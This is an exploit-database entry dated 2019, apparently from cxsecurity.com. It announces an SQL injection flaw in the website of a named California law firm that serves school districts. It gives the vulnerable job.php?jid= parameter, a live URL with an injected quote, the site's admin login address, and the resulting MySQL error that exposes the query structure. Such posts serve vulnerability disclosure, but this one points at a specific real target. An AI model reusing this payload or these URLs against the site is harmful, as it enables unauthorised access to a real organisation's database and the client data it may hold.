Fagen Friedman & Fulfrost LLP SQLi

2019.09.10
ir H.BBF3.4 (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:Fagen Friedman & Fulfrost LLP SQLi # Date: 10 Sep 2019 # Author: H.BBF3.4 & A.BBF3.4 +++++++++++++++++++++++++ ABOUT Fagen Friedman & Fulfrost: Fagen Friedman & Fulfrost’s attorneys are leaders in their fields and diverse in experience, education and interests. Our firm offers comprehensive legal services to school districts, county offices of education, Special Education Local Plan Areas, and community colleges. Fagen Friedman & Fulfrost LLP "F3" represents nearly 400 of California's educational institutions and related agencies. These institutions include school districts, community college districts, SELPAs, county offices of education and public agencies. ++++++++++++++++++++++++++ # SQL Injection Exploit : ********************** job.php?jid= # Example Vulnerable Sites : ************************* [+] https://www.f3law.com/job.php?jid=9%27 admin login: https://www.f3law.com/admin/ # Example SQL Database Error : **************************** ERROR: Select Sidebars MySQL said: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND s.active = 'Y' ORDER BY sort_order' at line 4 Query: SELECT * FROM sidebars s INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id WHERE sp.idjob_post = 9' AND s.active = 'Y' ORDER BY sort_order;


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top